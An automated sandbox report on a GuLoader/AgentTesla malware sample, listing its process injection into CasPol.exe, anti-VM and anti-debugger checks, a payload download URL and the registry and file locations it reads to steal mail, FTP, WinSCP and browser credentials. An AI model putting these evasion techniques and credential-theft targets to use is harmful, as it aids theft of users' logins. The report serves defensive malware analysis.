            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000013.00000000.1107473483.0000000000D30000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1333152081.0000000002AB0000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_00406471 push edi; iretd 2_2_00406472
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_00409011 push esp; retf 2_2_00409013
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_0040682F push esi; retf 2_2_00406830
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_0040A490 push ds; iretd 2_2_0040A491
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_004079F6 push eax; retf 2_2_00407A10
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_004055BF push ds; ret 2_2_004055D9
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_00405ECC push ebp; ret 2_2_00405ED8
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_00407F27 push edi; ret 2_2_00407F28
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_00407FBA push eax; iretd 2_2_00407FBB
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB0EAF push ebx; retf 2_2_02AB0EB0
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB34A0 push edx; retf 2_2_02AB355C
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB208F push eax; retf 2_2_02AB2090
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB4482 push esp; retf 2_2_02AB44E4
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB3AE0 push eax; retf 2_2_02AB3AFC
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB3AE0 push ebp; retf 2_2_02AB3BF0
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB3CF6 push ebx; retf 2_2_02AB3CFC
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB40C7 push ecx; retf 2_2_02AB40C8
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB28DF push edx; retf 2_2_02AB28E0
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB0425 push ds; retf 2_2_02AB0470
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB4E1A push ds; iretd 2_2_02AB4E23
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB4451 push esp; retf 2_2_02AB44E4
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB4BBE push 00000050h; retf 2_2_02AB4BC0
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB3FBC push edx; retf 2_2_02AB3FC4
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB4786 push eax; retf 2_2_02AB47A0
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB4986 push esp; retf 2_2_02AB49B0
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB2B92 push ebp; retf 2_2_02AB2BA8
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB3BFB push ebp; retf 2_2_02AB3BF0
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB29F8 push edx; retf 2_2_02AB2A00
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB3BFD push ebp; retf 2_2_02AB3BF0
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB29CB push edx; retf 2_2_02AB29E0
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeCode function: 2_2_02AB4BD8 push esp; retf 2_2_02AB4BE4
            Source: initial sampleStatic PE information: section name: .text entropy: 7.15645216813
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: G47wmLn8uy.exe, 00000002.00000002.1334641181.0000000004C10000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
            Source: G47wmLn8uy.exe, 00000002.00000002.1334641181.0000000004C10000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5661219437.0000000000F10000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: CasPol.exe, 00000013.00000002.5661219437.0000000000F10000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1RVZMBX5UH5TLF4YLXHMC756C1SKQ0VOB
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8088Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9947Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_010FF6B8 sgdt fword ptr [eax]19_2_010FF6B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeSystem information queried: ModuleInformationJump to behavior
            Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: G47wmLn8uy.exe, 00000002.00000002.1334641181.0000000004C10000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
            Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: CasPol.exe, 00000013.00000002.5665528385.00000000011DB000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWP
            Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000013.00000002.5667755559.0000000001238000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: CasPol.exe, 00000013.00000002.5667755559.0000000001238000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWk
            Source: G47wmLn8uy.exe, 00000002.00000002.1334641181.0000000004C10000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5661219437.0000000000F10000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: CasPol.exe, 00000013.00000002.5661219437.0000000000F10000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB
            Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: G47wmLn8uy.exe, 00000002.00000002.1334843822.0000000004F59000.00000004.00000001.sdmp, CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000013.00000002.5675161275.0000000002CF9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00C49938 LdrInitializeThunk,19_2_00C49938
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D30000Jump to behavior
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe" Jump to behavior
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe" Jump to behavior
            Source: C:\Users\user\Desktop\G47wmLn8uy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\G47wmLn8uy.exe" Jump to behavior
            Source: CasPol.exe, 00000013.00000002.5673314582.00000000018A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CasPol.exe, 00000013.00000002.5673314582.00000000018A0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: CasPol.exe, 00000013.00000002.5673314582.00000000018A0000.00000002.00020000.sdmpBinary or memory string: WProgram Managerh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4712, type: MEMORYSTR
            GuLoader behavior detectedShow sources
            Source: Initial fileSignature Results: GuLoader behavior
            Tries to steal Mail credentials (via file / registry access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
